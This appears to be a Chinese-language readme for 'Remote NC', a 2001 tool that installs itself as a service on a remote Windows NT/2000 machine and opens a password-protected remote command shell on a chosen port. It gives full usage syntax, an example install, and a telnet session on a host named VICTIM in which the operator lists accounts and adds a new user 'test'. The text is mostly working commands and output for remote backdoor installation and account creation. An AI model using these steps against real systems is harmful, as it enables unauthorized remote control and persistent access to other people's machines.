这是软件的说明
Remote NC是在NT/2000中运行的一个工具,和NC类似,可以远程执行命令。和NC比较的优点在于:
1、远程安装启动,不依赖于Schedule服务。
2、可以以指定的用户身份运行,也可以以系统用户身份运行。
3、作为服务安装于远程系统,系统会自动启动。
4、快速。
D:/My Documents/RemoteSVC/Release>RemoteNC.exe
=======RemoteNC Beta 1, Written by Assassin 2001=======
http://www.netXeyes.com http://www.netXeyes.org
Usage: RemoteNC <IP> <Username> <Password> <Starting Mode>
<Service Name> <Description Name>
<Listen Port> <Control Password> [/OVERWRITE]
<IP>: Remote Host IP Address 远程主机IP地址
<Username>: Account name in Remote Host Who Must Has
Administrators Privilege 用户名(必须具有Administrators权限)
<Password>: Password of Account Name 密码
<Start Mode>: LocalSystem or RunAsUser 启动模式:LocalSystem(系统用户) RunAsUser(以前面指定的用户身份运行,推荐)
<Service Name>: Specify Service Name 服务的名称
<Description>: Description of Service, Displayed in Service Manager 服务的说明,显示在服务管理器中,如果同名服务已经存在,将会安装失败。
<Listen Port>: Service Listen Port 启动后监听的端口
<Control Password>: Control Password 控制密码
[OVERWRITE]: 如果文件已经存在,则强制重写整个文件。
例子:
D:/My Documents/RemoteSVC/Release>RemoteNC 192.168.0.1 administrator password Runa
sUser "RemoteNC" "Provide Local CMD Redirect" 7 123456
=======RemoteNC Beta 1, Written by Assassin 2001=======
http://www.netXeyes.com http://www.netXeyes.org
[Install Service as RunasUser Mode]
Connecting 192.168.0.1 ..... Done.
Transffer File ..... Done.
Start Service ..... Done.
Now You can Tenlet 192.168.0.1 7 to Connect, Have a Joy
安装成功
D:/My Documents/RemoteSVC/Release>
D:/My Documents/RemoteSVC/Release>telnet 192.168.0.1 7 登录到制定的端口
RemoteNC Control Password: **************
===============Banyet Soft Labs. 1995-2001 All Rights Reserved.===============
=========Written by Assassin, Server Edition FluxShadow@21cn.com==============
Microsoft Windows 2000 [Version 5.00.2195]
RemoteNC>net user
User accounts for //VICTIM
-------------------------------------------------------------------------------
Administrator Guest IUSR_VICTIM
IWAM_VICTIM NetShowServices TsInternetUser zjf
The command completed successfully.
RemoteNC>net user test test /add
The command completed successfully.
由于是以Administrators组的权限启动,所以不会出现1312错误。
如果是以系统权限启动,有时会出现1312错误,这就是推荐采用RunasUser安装的原因。
RemoteNC>
如果用RunAsUser模式安装失败,请用LocalSystem模式。